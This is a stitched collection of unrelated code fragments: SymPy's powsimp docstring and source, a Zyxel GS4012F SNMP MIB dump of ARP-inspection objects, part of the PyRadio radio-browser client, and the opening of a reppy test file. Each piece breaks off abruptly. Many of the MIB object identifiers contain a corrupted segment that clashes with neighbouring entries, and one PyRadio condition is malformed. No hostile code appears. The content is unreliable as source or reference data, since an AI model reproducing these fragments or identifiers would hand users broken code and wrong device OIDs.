changing combine='base' or combine='exp'. By default, combine='all',
which does both. combine='base' will only combine::
a a a 2x x
x * y => (x*y) as well as things like 2 => 4
and combine='exp' will only combine
::
a b (a + b)
x * x => x
combine='exp' will strictly only combine exponents in the way that used
to be automatic. Also use deep=True if you need the old behavior.
When combine='all', 'exp' is evaluated first. Consider the first
example below for when there could be an ambiguity relating to this.
This is done so things like the second example can be completely
combined. If you want 'base' combined first, do something like
powsimp(powsimp(expr, combine='base'), combine='exp').
Examples
========
>>> from sympy import powsimp, exp, log, symbols
>>> from sympy.abc import x, y, z, n
>>> powsimp(x**y*x**z*y**z, combine='all')
x**(y + z)*y**z
>>> powsimp(x**y*x**z*y**z, combine='exp')
x**(y + z)*y**z
>>> powsimp(x**y*x**z*y**z, combine='base', force=True)
x**y*(x*y)**z
>>> powsimp(x**z*x**y*n**z*n**y, combine='all', force=True)
(n*x)**(y + z)
>>> powsimp(x**z*x**y*n**z*n**y, combine='exp')
n**(y + z)*x**(y + z)
>>> powsimp(x**z*x**y*n**z*n**y, combine='base', force=True)
(n*x)**y*(n*x)**z
>>> x, y = symbols('x y', positive=True)
>>> powsimp(log(exp(x)*exp(y)))
log(exp(x)*exp(y))
>>> powsimp(log(exp(x)*exp(y)), deep=True)
x + y
Radicals with Mul bases will be combined if combine='exp'
>>> from sympy import sqrt, Mul
>>> x, y = symbols('x y')
Two radicals are automatically joined through Mul:
>>> a=sqrt(x*sqrt(y))
>>> a*a**3 == a**4
True
But if an integer power of that radical has been
autoexpanded then Mul does not join the resulting factors:
>>> a**4 # auto expands to a Mul, no longer a Pow
x**2*y
>>> _*a # so Mul doesn't combine them
x**2*y*sqrt(x*sqrt(y))
>>> powsimp(_) # but powsimp will
(x*sqrt(y))**(5/2)
>>> powsimp(x*y*a) # but won't when doing so would violate assumptions
x*y*sqrt(x*sqrt(y))
"""
def recurse(arg, **kwargs):
_deep = kwargs.get('deep', deep)
_combine = kwargs.get('combine', combine)
_force = kwargs.get('force', force)
_measure = kwargs.get('measure', measure)
return powsimp(arg, _deep, _combine, _force, _measure)
expr = sympify(expr)
if not isinstance(expr, Basic) or expr.is_Atom or expr in (
exp_polar(0), exp_polar(1)):
return expr
if deep or expr.is_Add or expr.is_Mul and _y not in expr.args:
expr = expr.func(*[recurse(w) for w in expr.args])
if expr.is_Pow:
return recurse(expr*_y, deep=False)/_y
if not expr.is_Mul:
return expr
# handle the Mul
if combine in ('exp', 'all'):
# Collect base/exp data, while maintaining order in the
# non-commutative parts of the product
c_powers = defaultdict(list)
nc_part = []
newexpr = []
coeff = S.One
for term in expr.args:
if term.is_Rational:
coeff *= term
continue
if term.is_Pow:
term = _denest_pow(term)
if term.is_commutative:
b, e = term.as_base_exp()
if deep:
b, e = [recurse(i) for i in [b, e]]
c_powers[b].append(e)
else:
# This is the logic that combines exponents for equal,
# but non-commutative bases: A**x*A**y == A**(x+y).
if nc_part:
b1, e1 = nc_part[-1].as_base_exp()
b2, e2 = term.as_base_exp()
if (b1 == b2 and
e1.is_commutative and e2.is_commutative):
nc_part[-1] = Pow(b1, Add(e1, e2))
continue
nc_part.append(term)
# add up exponents of common bases
for b, e in ordered(iter(c_powers.items())):
# allow 2**x/4 -> 2**(x - 2); don't do this when b and e are
# Numbers since autoevaluation will undo it, e.g.
# 2**(1/3)/4 -> 2**(1/3 - 2) -> 2**(1/3)/4
if (b and b.is_Number and not all(ei.is_Number for ei in e) and \
coeff is not S.One and
b not in (S.One, S.NegativeOne)):
m = multiplicity(abs(b), abs(coeff))
if m:
e.append(m)
coeff /= b**m
c_powers[b] = Add(*e)
if coeff is not S.One:
if coeff in c_powers:
c_powers[coeff] += S.One
else:
c_powers[coeff] = S.One
# convert to plain dictionary
c_powers = dict(c_powers)
# check for base and inverted base pairs
be = list(c_powers.items())
skip = set() # skip if we already saw them
for b, e in be:
if b in skip:
continue
bpos = b.is_positive or b.is_polar
if bpos:
binv = 1/b
if b != binv and binv in c_powers:
if b.as_numer_denom()[0] is S.One:
c_powers.pop(b)
c_powers[binv] -= e
else:
skip.add(binv)
e = c_powers.pop(binv)
c_powers[b] -= e
# check for base and negated base pairs
be = list(c_powers.items())
_n = S.NegativeOne
for i, (b, e) in enumerate(be):
if ((-b).is_Symbol or b.is_Add) and -b in c_powers:
if (b.is_positive in (0, 1) or e.is_integer):
c_powers[-b] += c_powers.pop(b)
if _n in c_powers:
c_powers[_n] += e
else:
c_powers[_n] = e
# filter c_powers and convert to a list
c_powers = [(b, e) for b, e in c_powers.items() if e]
# ==============================================================
# check for Mul bases of Rational powers that can be combined with
# separated bases, e.g. x*sqrt(x*y)*sqrt(x*sqrt(x*y)) ->
# (x*sqrt(x*y))**(3/2)
# ---------------- helper functions
def ratq(x):
'''Return Rational part of x's exponent as it appears in the bkey.
'''
return bkey(x)[0][1]
def bkey(b, e=None):
'''Return (b**s, c.q), c.p where e -> c*s. If e is not given then
it will be taken by using as_base_exp() on the input b.
e.g.
x**3/2 -> (x, 2), 3
x**y -> (x**y, 1), 1
x**(2*y/3) -> (x**y, 3), 2
exp(x/2) -> (exp(a), 2), 1
'''
if e is not None: # coming from c_powers or from below
if e.is_Integer:
return (b, S.One), e
elif e.is_Rational:
return (b, Integer(e.q)), Integer(e.p)
else:
c, m = e.as_coeff_Mul(rational=True)
if c is not S.One:
return (b**m, Integer(c.q)), Integer(c.p)
else:
return (b**e, S.One), S.One
else:
return bkey(*b.as_base_exp())
def update(b):
'''Decide what to do with base, b. If its exponent is now an
integer multiple of the Rational denominator, then remove it
and put the factors of its base in the common_b dictionary or
update the existing bases if necessary. If it has been zeroed
out, simply remove the base.
'''
newe, r = divmod(common_b[b], b[1])
if not r:
common_b.pop(b)
if newe:
for m in Mul.make_args(b[0]**newe):
b, e = bkey(m)
if b not in common_b:
common_b[b] = 0
common_b[b] += e
if b[1] != 1:
bases.append(b)
# ---------------- end of helper functions
# assemble a dictionary of the factors having a Rational power
common_b = {}
done = []
bases = []
for b, e in c_powers:
b, e = bkey(b, e)
common_b[b] = e
if b[1] != 1 and b[0].is_Mul:
bases.append(b)
bases.sort(key=default_sort_key) # this makes tie-breaking canonical
bases.sort(key=measure, reverse=True) # handle longest first
for base in bases:
if base not in common_b: # it may have been removed already
continue
b, exponent = base
last = False # True when no factor of base is a radical
qlcm = 1 # the lcm of the radical denominators
while True:
bstart = b
qstart = qlcm
bb = [] # list of factors
ee = [] # (factor's expo. and it's current value | |
},
],
"range" : {
"min" : "0",
"max" : "1024"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogInterval" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2147483647"
},
],
"range" : {
"min" : "0",
"max" : "2147483647"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1",
"status" : "current",
"linkage" : [
"arpInspectVlanVid",
],
"description" :
"""""",
}, # row
"arpInspectVlanVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectVlanLog" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "1"
},
"none" : {
"nodetype" : "namednumber",
"number" : "2"
},
"permit" : {
"nodetype" : "namednumber",
"number" : "3"
},
"deny" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectVlanStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disabled" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1",
"status" : "current",
"linkage" : [
"arpInspectPortIndex",
],
"description" :
"""""",
}, # row
"arpInspectPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectPortTrust" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"trusted" : {
"nodetype" : "namednumber",
"number" : "1"
},
"untrusted" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2048"
},
],
"range" : {
"min" : "0",
"max" : "2048"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortInterval" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "15"
},
],
"range" : {
"min" : "1",
"max" : "15"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.2",
}, # node
"arpInspectFilterClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectFilterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectFilterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"arpInspectFilterMac",
"arpInspectFilterVid",
],
"description" :
"""""",
}, # row
"arpInspectFilterMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterExpiry" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterReason" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"macVid" : {
"nodetype" : "namednumber",
"number" : "1"
},
"port" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ip" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectLogTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectLogEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1",
"status" : "current",
"linkage" : [
"arpInspectLogMac",
"arpInspectLogVid",
"arpInspectLogPort",
"arpInspectLogIp",
],
"description" :
"""""",
}, # row
"arpInspectLogMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogNumPkt" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "DateAndTime"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectStatisticsEntry" : | |
# -*- coding: utf-8 -*-
import curses
try:
from dns import resolver
except ImportError:
pass
from copy import deepcopy
import random
import json
import collections
from operator import itemgetter
try:
import requests
except ImportError:
pass
import threading
import logging
from .player import info_dict_to_list
from .cjkwrap import cjklen, PY3
from .countries import countries
from .simple_curses_widgets import SimpleCursesLineEdit, SimpleCursesHorizontalPushButtons, SimpleCursesWidgetColumns, SimpleCursesCheckBox
import locale
locale.setlocale(locale.LC_ALL, '') # set your locale
logger = logging.getLogger(__name__)
def country_from_server(a_server):
    '''Map a radio-browser server hostname to a country name.

    The first hostname label minus its trailing character is treated as
    a country code and looked up in the countries table; when the lookup
    fails, the raw first label is returned instead.  A falsy server
    yields None.
    '''
    if not a_server:
        return None
    label = a_server.split('.')[0]
    code = label[:-1].upper()
    if code in countries.keys():
        return countries[code]
    return label
def capitalize_comma_separated_string(a_string):
    '''Return *a_string* with every comma-separated token stripped of
    surrounding whitespace, capitalized, and re-joined with ", ".
    '''
    return ', '.join(token.strip().capitalize()
                     for token in a_string.split(','))
class PyRadioStationsBrowser(object):
    ''' A base class to get results from online radio directory services.

        Actual implementations should be subclasses of this one, overriding
        the stub methods below (search, url, stations, click, vote, ...).
    '''

    # Service endpoint and window title; concrete subclasses override these.
    BASE_URL = ''
    TITLE = ''
    # Curses parent windows (set via the properties below).
    _parent = _outer_parent = None
    # Station rows as returned by the service (subclass-specific dicts).
    _raw_stations = []
    _last_search = None
    # Number of header lines drawn inside the stations window.
    _internal_header_height = 0
    # Timeouts (seconds) for resolving a URL and for a search request.
    _url_timeout = 3
    _search_timeout = 3
    # Called after a vote completes (set via the vote_callback property).
    _vote_callback = None
    # Sort helper object and its popup window, if the subclass uses them.
    _sort = _sort_win = None

    # Normally outer body (holding box, header, internal header) is
    # 2 chars wider than the internal body (holding the stations)
    # This property value is half the difference (normally 2 / 2 = 1)
    # Used to chgat the columns' separators in internal body
    # Check if the cursor is divided as required and adjust
    _outer_internal_body_diff = 2
    _outer_internal_body_half_diff = 1

    def __init__(self,
                 config,
                 config_encoding,
                 session=None,
                 search=None,
                 pyradio_info=None,
                 search_return_function=None,
                 message_function=None):
        ''' Initialize the station's browser.

            It should return a valid search result (for example,
            www.radio-browser.info implementation, returns 100 stations
            sorted by number of votes).

            Parameters
            ----------
            search
                Search parameters to be used instead of the default.
        '''
        pass

    @property
    def parent(self):
        '''Parent curses window; also propagated to the sort helper.'''
        return self._parent

    @parent.setter
    def parent(self, val):
        self._parent = val
        if self._sort:
            self._sort._parent = val

    @property
    def outer_parent(self):
        '''Outer curses window; also propagated to the sort popup window.'''
        return self._outer_parent

    @outer_parent.setter
    def outer_parent(self, val):
        self._outer_parent = val
        if self._sort_win:
            self._sort_win._parent = val

    @property
    def outer_internal_body_half_diff(self):
        '''Half the outer/inner body width difference (read only).'''
        return self._outer_internal_body_half_diff

    @outer_internal_body_half_diff.setter
    def outer_internal_body_half_diff(self, value):
        raise ValueError('property is read only')

    @property
    def internal_header_height(self):
        '''Header lines inside the stations window (read only).'''
        return self._internal_header_height

    @internal_header_height.setter
    def internal_header_height(self, value):
        raise ValueError('property is read only')

    @property
    def title(self):
        '''Window title of the browser (alias of the TITLE attribute).'''
        return self.TITLE

    @title.setter
    def title(self, value):
        self.TITLE = value

    @property
    def vote_callback(self):
        '''Callable invoked when a vote operation finishes.'''
        return self._vote_callback

    @vote_callback.setter
    def vote_callback(self, val):
        self._vote_callback = val

    def stations(self, playlist_format=1):
        '''Return stations as a PyRadio playlist list (stub).'''
        return []

    def url(self, id_in_list):
        ''' Return a station's real/playable url

            It has to be implemented only in case have_to_retrieve_url is True

            Parameters
            ----------
            id_in_list
                id in list of stations (0..len-1)

            Returns
            -------
                Real/playable url or '' if failed (string)
        '''
        return ''

    def set_played(self, id_in_list, played):
        ''' Note that a player has been played.

            Parameters
            ----------
            id_in_list
                id in list of stations (0..len-1)
            played
                True or False
        '''
        pass

    def search(self, go_back_in_history=True):
        '''Execute a search against the service; return stations (stub).'''
        return []

    def set_encoding(self, id_in_list, new_encoding):
        '''Set a station's encoding (stub).'''
        return

    def format_station_line(self, id_in_list, pad, width):
        '''Render one station as a display line (stub).'''
        return ''

    def click(self, a_station):
        '''Register a station click with the service (stub).'''
        pass

    def vote(self, a_station):
        '''Vote for a station on the service (stub).'''
        pass
class RadioBrowserInfo(PyRadioStationsBrowser):
    '''PyRadioStationsBrowser implementation for api.radio-browser.info.'''

    BASE_URL = 'api.radio-browser.info'
    TITLE = 'Radio Browser '
    # Default HTTP headers; __init__ replaces User-Agent with the real
    # PyRadio version string when one is supplied.
    _headers = {'User-Agent': 'PyRadio/dev',
                'Content-Type': 'application/json'}
    _raw_stations = []
    # the output format to use based on window width
    # Default value: -1
    # Possible values: 0..5
    # Look at format_station_line() for info
    _output_format = -1
    _info_len = []
    _info_name_len = 0
    # NOTE(review): duplicate of the _raw_stations assignment above
    _raw_stations = []
    _internal_header_height = 1
    # Search history entries (dicts with type/term/post_data) and cursor.
    _search_history = []
    _search_history_index = -1
    # Fixed display widths (columns) for the optional station fields.
    _columns_width = {
        'votes': 7,
        'clickcount': 7,
        'bitrate': 7,
        'country': 18,
        'language': 15,
        'state': 18,
        'tags': 20,
        'codec': 5
    }
    _server_selection_window = None
    _dns_info = None
    search_by = _old_search_by = None
    keyboard_handler = None
def __init__(self,
config,
config_encoding,
session=None,
search=None,
pyradio_info=None,
search_return_function=None,
message_function=None):
'''
When first_search is True, it means that we are opening
the browser. If empty result is returned by the first
browser search, we show an empty stations' list.
if it is False and an empty result is returned by the first
browser search, which means we are already in the browser's
search screen, we just display the 'no result message'.
All of this is done at radio.py
'''
self.first_search = True
self._cnf = config
if session:
self._session = session
else:
self._session = requests.Session()
self._pyradio_info = pyradio_info.strip()
if self._pyradio_info:
self._headers['User-Agent'] = self._pyradio_info.replace(' ', '/')
self._config_encoding = config_encoding
self._message_function = message_function
self._search_return_function = search_return_function
def initialize(self):
self._dns_info = RadioBrowserInfoDns()
self._server = self._dns_info.give_me_a_server_url()
if logger.isEnabledFor(logging.INFO):
logger.info('random server is ' + self._server)
if self._server:
self._get_title()
self._search_history.append({
'type': 'topvote',
'term': '100',
'post_data': None,
})
self._search_history.append({
'type': 'bytagexact',
'term': 'big band',
'post_data': {'order': 'votes', 'reverse': 'true'},
})
self._search_history.append({
'type': 'search',
'term': '',
'post_data': {'name': 'jaz'},
})
self._search_history_index = 0
return True
return False
    @property
    def server(self):
        '''Hostname of the radio-browser API server in use (read only).'''
        return self._server
@property
def add_to_title(self):
return self._server.split('.')[0]
    def _get_title(self):
        '''Set TITLE to include the country the active server is in.'''
        self.TITLE = 'Radio Browser ({})'.format(country_from_server(self._server))
def stations(self, playlist_format=1):
''' Return stations' list (in PyRadio playlist format)
Parameters
----------
playlist_format
0: station name, url
1: station name, url, encoding
2: station name, url, encoding, browser flag (default)
'''
ret = []
for n in self._raw_stations:
if playlist_format == 0:
ret.append([n['name'], n['url']])
elif playlist_format == 1:
enc = '' if n['encoding'] == self._config_encoding else n['encoding']
ret.append([n['name'], n['url'], enc])
else:
enc = '' if n['encoding'] == self._config_encoding else n['encoding']
ret.append([n['name'], n['url'], enc, ''])
return ret
def url(self, id_in_list):
''' Get a station's url using resolved_url
Parameters
----------
id_in_list
id in list of stations (0..len-1)
Returns
-------
url or '' if failed
'''
if self._raw_stations:
if id_in_list < len(self._raw_stations):
if self._raw_stations[id_in_list]['url_resolved']:
return self._raw_stations[id_in_list]['url_resolved']
else:
return self._raw_stations[id_in_list]['url']
return ''
def click(self, a_station):
def do_click(a_station_uuid):
url = 'http://' + self._server + '/json/url/' + a_station_uuid
try:
r = self._session.get(url=url, headers=self._headers, timeout=(self._search_timeout, 2 * self._search_timeout))
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Station click result: "{}"'.format(r.text))
except:
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Station click failed...')
threading.Thread(target=do_click, args=(self._raw_stations[a_station]['stationuuid'], )).start()
def vote(self, a_station):
url = 'http://' + self._server + '/json/vote/' + self._raw_stations[a_station]['stationuuid']
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Voting for: {}'.format(self._raw_stations[a_station]))
logger.debug('Voting url: ' + url)
try:
r = self._session.get(url=url, headers=self._headers, timeout=(self._search_timeout, 2 * self._search_timeout))
message = json.loads(r.text)
self.vote_result = self._raw_stations[a_station]['name'], message['message'][0].upper() + message['message'][1:]
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Voting result: "{}"'.format(message))
except:
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Station voting failed...')
self.vote_result = self._raw_stations[a_station]['name'], 'Voting for station failed'
if self._vote_callback:
self._vote_callback()
    def get_info_string(self, a_station, max_width=60):
        '''Build a "|Label:| value" multi-line info string for a station.

        Field values come from self._raw_stations[a_station]; the text is
        wrapped by info_dict_to_list() and then post-processed to repair
        lines that were wrapped right after a label.  Returns a 2-tuple
        (info_string, '').
        '''
        # Display label -> key in the raw station dict, in display order.
        guide = [
            ('Name', 'name'),
            ('URL', 'url'),
            ('Resolved URL', 'url_resolved'),
            ('Website', 'homepage'),
            ('Tags', 'tags'),
            ('Votes', 'votes'),
            ('Clicks', 'clickcount'),
            ('Country', 'country'),
            ('State', 'state'),
            ('Language', 'language'),
            ('Bitrate', 'bitrate'),
            ('Codec', 'codec')
        ]
        # Hide "Resolved URL" when it is identical to the plain URL.
        if self._raw_stations[a_station]['url'] == self._raw_stations[a_station]['url_resolved']:
            guide.pop(2)
        info = collections.OrderedDict()
        for n in guide:
            info[n[0]] = str(self._raw_stations[a_station][n[1]])
            if n[1] == 'bitrate':
                info[n[0]] += ' kb/s'
        a_list = []
        fix_highlight = []
        a_list = info_dict_to_list(info, fix_highlight, max_width)
        # '|' marks highlight boundaries for the downstream renderer.
        ret = '|' + '\n|'.join(a_list)
        # logger.error('DE \n\n{}\n\n'.format(ret))
        sp = ret.split('\n')
        # wrong_wrap holds the index of a line that is the continuation of
        # a line which ended in ':' (i.e. the wrap split label from value).
        wrong_wrap = -1
        for i, n in enumerate(sp):
            # logger.exception('DE {0}: "{1}"'.format(i, n))
            if wrong_wrap == i:
                # Merge this continuation back into the previous line and
                # mark it with a leading '*' for removal below.
                sp[i] = n.replace('|', '')
                sp[i-1] += sp[i].replace('_', '')
                sp[i] = '*' + sp[i]
                wrong_wrap = -1
            else:
                if ': ' not in n:
                    sp[i] = n[1:]
                if n[-1] == ':':
                    ''' wrong wrapping! '''
                    wrong_wrap = i + 1
                    sp[i] += '|'
                # Normalize: every line ends in a space and starts with '|'.
                if sp[i][-1] != ' ':
                    sp[i] += ' '
                if sp[i][0] != '|':
                    sp[i] = '|' + sp[i]
        # NOTE(review): popping while iterating skips the element after each
        # removal; harmless only if merged '*' lines are never adjacent —
        # confirm before restructuring.
        for i, n in enumerate(sp):
            if n[0] == '*':
                sp.pop(i)
        ret = '\n'.join(sp).replace(': |', ':| ').replace(': ', ':| ')
        # logger.error('DE \n\n{}\n\n'.format(ret))
        return ret, ''
def search(self, go_back_in_history=True):
''' Search for stations with parameters.
Result is limited to 100 stations by default (use the
'limit' parameter to change it).
Parameters
----------
data
A dictionary containing the fields described at
http://www.radio-browser.info/webservice/#Advanced_station_search
Returns
-------
self._raw_stations
A dictionary with a subset of returned station data.
Its format is:
name : station name
id : station id
url : station url
resolved_url : station resolved_url
tags : starion tags
bitrate : station bitrate
hls : HLS status
votes : station votes
clickcount : station clicks
country : station country
state : statiob state
language : station language
codec : station codec
encoding : station encoding ('' means utf-8)
'''
if self._message_function:
self._message_function()
self.search_by = self._old_search_by = None
self._get_search_elements(
self._search_history[self._search_history_index]
)
self._old_search_by = self.search_by
self._sort = None
url = self._format_url(self._search_history[self._search_history_index])
post_data = {}
if self._search_history[self._search_history_index]['post_data']:
post_data = deepcopy(self._search_history[self._search_history_index]['post_data'])
self._output_format = -1
if self._search_type > 0:
if 'limit' not in post_data.keys():
post_data['limit'] = 100
if not 'hidebroken' not in post_data.keys():
post_data['hidebroken'] = True
if logger.isEnabledFor(logging.DEBUG):
logger.debug(' | |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''Tests cribbed from linkscape/processing/test/robotstxt.test.old.cc'''
import unittest
import reppy
import logging
from reppy import Utility
reppy.logger.setLevel(logging.FATAL)
